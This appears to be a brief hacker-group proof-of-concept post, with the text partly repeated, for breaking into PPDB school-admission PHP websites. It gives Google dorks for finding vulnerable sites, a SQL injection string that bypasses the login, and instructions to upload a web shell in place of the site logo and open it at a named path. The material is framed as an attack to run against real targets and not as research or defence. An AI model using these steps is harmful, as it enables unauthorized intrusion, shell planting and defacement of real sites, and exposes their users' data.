/!Thanks to : Family Attack Cyber - N45HT - IndoXploit - BackBox Indonesia
/!SanstechLab - 2018
POC
=======
Search on google , with dork : inurl:/umum/ ext:php PPDB, inurl:/umum/login.php
Bypass with username & Password : ' or 1=1 limit 1 -- -+
Upload Your Shell ?
Go to Admin Settings (Not All Website have it), replace the logo picture with ur shell
Access Shell ?
targeted.com/[path]/images/logo/[yourname].php
End POC ========
Upload Your Shell ?
Go to Admin Settings (Not All Website have it), replace the logo picture with ur shell
Access Shell ?
targeted.com/[path]/images/logo/[yourname].php
End POC ========
DEFACER
ReplyDelete